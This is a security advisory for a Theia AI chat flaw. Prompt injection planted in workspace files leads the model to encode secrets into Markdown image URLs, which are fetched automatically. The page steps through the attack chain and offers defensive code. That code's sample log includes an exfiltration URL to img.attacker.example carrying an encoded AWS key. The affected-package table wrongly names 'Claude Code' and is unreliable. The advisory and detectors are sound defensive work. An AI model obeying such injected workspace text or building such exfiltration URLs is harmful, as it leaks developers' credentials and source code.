CVE-2026-22551: @theia/ai-chat: prompt injection exfiltrates workspace secrets

GHSA-qwjm-9c66-w4q4 MEDIUM
Published June 18, 2026
CISO Take

Eclipse Theia's AI chat rendered Markdown image tags from AI-generated responses without sanitization, enabling automatic HTTP requests to arbitrary external URLs. Combined with a malicious workspace containing prompt injection payloads—a realistic threat for any developer who clones an untrusted repository—an attacker can coerce the AI into encoding sensitive workspace data (source code, API keys, .env secrets) into image URLs and silently transmitting them to an attacker-controlled server. While not in CISA KEV and lacking public exploits, exploitation is low-sophistication post-access: no additional user interaction beyond normal AI chat usage is required once the malicious workspace is open. Upgrade all @theia/ai-* packages to 1.71.0 immediately and enforce workspace trust settings; until patched, disable Theia AI features for untrusted workspaces.

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

Medium risk with potential for high-value impact in developer-focused environments. The attack requires social engineering to open a malicious workspace—a realistic vector given the widespread developer practice of cloning repositories from unknown sources. Once the workspace is open, exploitation occurs automatically during normal AI chat usage with no further attacker interaction. The blast radius is constrained to individual developer workstations, but the assets at risk are high-value: API keys, authentication tokens, proprietary source code, and infrastructure secrets typically present in development environments. The absence of active exploitation evidence or public exploits reduces immediate urgency, but the attack vector is novel and particularly relevant to organizations running Eclipse Theia as a cloud or enterprise IDE platform with AI features enabled.

How does the attack unfold?

  1. Malicious Workspace Delivery (AML.T0051.001): Attacker embeds prompt injection payloads in workspace files (README, source comments, config files) of a public repository and lures a developer into cloning and opening it in Eclipse Theia.

  2. Context Poisoning via AI Chat (AML.T0080.001): Developer initiates an AI chat session; the LLM ingests full workspace context including the injected instructions, which direct it to construct Markdown image tags with exfiltration URLs encoding sensitive workspace data.

  3. Covert Exfiltration via Image Rendering (AML.T0077): Theia renders the AI's Markdown response containing the crafted image tags, triggering automatic HTTP GET requests to the attacker's server with workspace secrets encoded in the URL parameters.

  4. Sensitive Data Compromise (AML.T0057): Attacker receives developer workspace secrets (API keys, tokens, source code) from server logs, enabling follow-on attacks against the organization's infrastructure or supply chain.

What systems are affected?

Package       Ecosystem   Vulnerable Range   Patched
Claude Code   npm         < 1.71.0           1.71.0
(132.3K, pushed 6d ago, 74% patched, ~2d to patch)

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What should I do?

6 steps
  1. Patch: Upgrade all @theia/ai-* packages to version 1.71.0 or later immediately.

  2. Workspace trust: Enable and enforce workspace trust settings introduced in v1.71.0—establish policy that AI features are disabled for untrusted workspaces.

  3. Interim workaround: If immediate upgrade is not feasible, disable Theia AI chat features entirely until patched.

  4. Network monitoring: Review proxy and firewall logs for outbound HTTP requests from IDE processes to unexpected domains, particularly image-fetch patterns with unusually long or encoded URL paths.

  5. Workspace audit: Inspect files (README, config files, comments) in repositories opened before patching for embedded prompt injection patterns.

  6. CSP hardening: Validate that your Theia deployment enforces Content Security Policy headers restricting image source origins to known-safe domains.
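Remediation step 4 as working code, an added example that is not part of this advisory: a scanner over constructed proxy log lines (in an assumed, simplified format) that flags image fetches to unknown hosts whose URL path or query carries an encoded blob, is unusually long, or contains a secret-like token. The host allowlist, the log format and the names inspectImageFetch and scanProxyLog are assumptions.

```typescript
// Added example, not part of the advisory: remediation step 4 as code. It scans
// proxy log lines for image fetches whose URL looks like an exfiltration carrier.
// Assumed, simplified log format: <timestamp> <client-ip> <method> <url> <status> <accept>

interface Finding { url: string; reasons: string[] }

// Assumption: hosts that legitimately serve images to the IDE fleet.
const KNOWN_IMAGE_HOSTS = ["cdn.example.internal"];
// Runs of 40+ base64/hex-style characters are typical of encoded file contents.
const ENCODED_BLOB = /[A-Za-z0-9+/=_-]{40,}/;
// Two well-known credential prefixes (AWS access key id, GitHub PAT) as a sample.
const SECRET_HINT = /AKIA[0-9A-Z]{16}|ghp_[A-Za-z0-9]{20,}/;
const MAX_URL_LENGTH = 256;

function parseUrl(raw: string): URL | null {
  try { return new URL(raw); } catch { return null; }
}

function inspectImageFetch(line: string): Finding | null {
  const fields = line.trim().split(/\s+/);
  if (fields.length < 6) return null;
  const [, , method, rawUrl, , accept] = fields;
  if (method !== "GET" || accept.indexOf("image/") !== 0) return null; // image fetches only
  const url = parseUrl(rawUrl);
  if (!url) return null;
  const carrier = url.pathname + url.search;   // where a smuggled payload would sit
  const reasons: string[] = [];
  if (KNOWN_IMAGE_HOSTS.indexOf(url.hostname) === -1) reasons.push("unknown image host");
  if (rawUrl.length > MAX_URL_LENGTH) reasons.push("unusually long URL");
  if (ENCODED_BLOB.test(carrier)) reasons.push("encoded blob in URL");
  const secretHit = SECRET_HINT.test(carrier);
  if (secretHit) reasons.push("secret-like token in URL");
  // An unknown host alone is noisy; require a second signal or a secret hint.
  const suspicious = reasons.length >= 2 || secretHit;
  return suspicious ? { url: rawUrl, reasons } : null;
}

function scanProxyLog(lines: string[]): Finding[] {
  return lines.map(inspectImageFetch).filter((f): f is Finding => f !== null);
}

// Constructed sample: a benign CDN fetch, an exfiltration-shaped fetch, a non-image request.
const SAMPLE_LOG = [
  "2026-06-18T10:01:02Z 10.0.0.12 GET https://cdn.example.internal/logo.png 200 image/*",
  "2026-06-18T10:01:05Z 10.0.0.12 GET https://img.attacker.example/p.png?d=QVdTX1NFQ1JFVF9BQ0NFU1NfS0VZPWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OQ 200 image/*",
  "2026-06-18T10:01:09Z 10.0.0.12 GET https://docs.example.internal/page.html 200 text/html",
];
```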

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.2 - AI system input and output controls
NIST AI RMF
MANAGE 2.2 - Mechanisms to address AI risks
OWASP LLM Top 10
LLM01:2025 - Prompt Injection
LLM02:2025 - Sensitive Information Disclosure
LLM05:2025 - Improper Output Handling

Frequently Asked Questions

Is CVE-2026-22551 actively exploited?

No confirmed active exploitation of CVE-2026-22551 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-22551?

This vulnerability affects the following AI/ML architecture patterns: AI-integrated development environments, Agent frameworks, Developer AI assistants, Cloud development environments (CDEs).

What is the CVSS score for CVE-2026-22551?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI-integrated development environments
Agent frameworks
Developer AI assistants
Cloud development environments (CDEs)

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means
AML.T0051.001 Indirect
AML.T0057 LLM Data Leakage
AML.T0077 LLM Response Rendering

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM01:2025, LLM02:2025, LLM05:2025

What are the technical details?

Original Advisory

In Eclipse Theia versions prior to 1.71.0, the AI chat rendered Markdown image tags from AI responses, triggering HTTP requests to arbitrary external URLs without restriction. Combined with prompt injection in a malicious workspace, an attacker could induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The workspace trust enforcement introduced in v1.71.0 mitigates the documented attack chain by disabling AI features in untrusted workspaces.

Exploitation Scenario

An attacker creates a public GitHub repository with prompt injection payloads embedded in workspace files—for example, a crafted comment in a README or source file containing instructions directing the AI to include an image tag encoding the contents of sensitive files in its response URL. A developer clones the repository and opens it in Eclipse Theia with AI features enabled. During a routine AI chat session—asking the AI to explain the codebase or help fix a bug—the LLM ingests the full workspace context including the injected instructions. The AI constructs a Markdown response containing an image tag with a URL encoding sensitive data (API keys, .env secrets, authentication tokens) pointing to the attacker's server. Theia renders the response and automatically triggers an HTTP GET request delivering the encoded secrets. The developer sees a normal-looking chat response with no visible indication of the exfiltration.
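The output-handling control this scenario calls for (LLM05, Improper Output Handling), shown as an added example that is not Theia's code: before an AI response reaches the Markdown renderer, keep only https images from an allowlisted origin with no query string and replace every other image reference with a visible marker. The origin https://ide.example.internal and the function names are assumptions.

```typescript
// Added example, not Theia's own code: neutralise image references in an
// LLM-generated chat response before it reaches the Markdown renderer.
// Theia <1.71.0 rendered ![alt](url) from AI output unchanged, so every image
// became an automatic GET to whatever URL the model (or an injected prompt) chose.

// Assumption: only the IDE's own origin may serve images inside chat responses.
const DEFAULT_ALLOWED_IMAGE_ORIGINS = ["https://ide.example.internal"];

interface SanitizeResult {
  markdown: string;   // response with untrusted images replaced by visible markers
  blocked: string[];  // removed URLs, for logging and alerting
}

// Matches ![alt](url "title") and <img src="url">. Adequate for a demonstration;
// a real renderer should enforce this policy on the Markdown AST, not with regexes.
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;
const HTML_IMG = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)["']?[^>]*>/gi;

function parseUrl(raw: string): URL | null {
  try { return new URL(raw); } catch { return null; }
}

function isAllowedImage(rawUrl: string, allowedOrigins: string[]): boolean {
  const url = parseUrl(rawUrl);
  if (!url) return false;                        // relative or malformed: untrusted
  if (url.protocol !== "https:") return false;   // rejects http:, data:, javascript:
  if (allowedOrigins.indexOf(url.origin) === -1) return false;
  // Secrets travel in the path or query, so refuse payload-shaped URLs even on
  // an allowed origin.
  return url.search === "" && url.pathname.length <= 200;
}

function sanitizeAiMarkdown(
  markdown: string,
  allowedOrigins: string[] = DEFAULT_ALLOWED_IMAGE_ORIGINS,
): SanitizeResult {
  const blocked: string[] = [];
  const decide = (alt: string, url: string): string => {
    if (isAllowedImage(url, allowedOrigins)) return `![${alt}](${url})`;
    blocked.push(url);
    // Leave a visible marker so the user notices the model tried to embed an image.
    return `[blocked image: ${alt || "no alt text"}]`;
  };
  const out = markdown
    .replace(MD_IMAGE, (_m, alt: string, url: string) => decide(alt, url))
    .replace(HTML_IMG, (_m, url: string) => decide("", url));
  return { markdown: out, blocked };
}
```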

Weaknesses (CWE)

CWE-201 — Insertion of Sensitive Information Into Sent Data: The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.

  • [Requirements] Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data.
  • [Implementation] Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent.

Source: MITRE CWE corpus.

Timeline

Published: June 18, 2026
Last Modified: June 19, 2026
First Seen: June 18, 2026
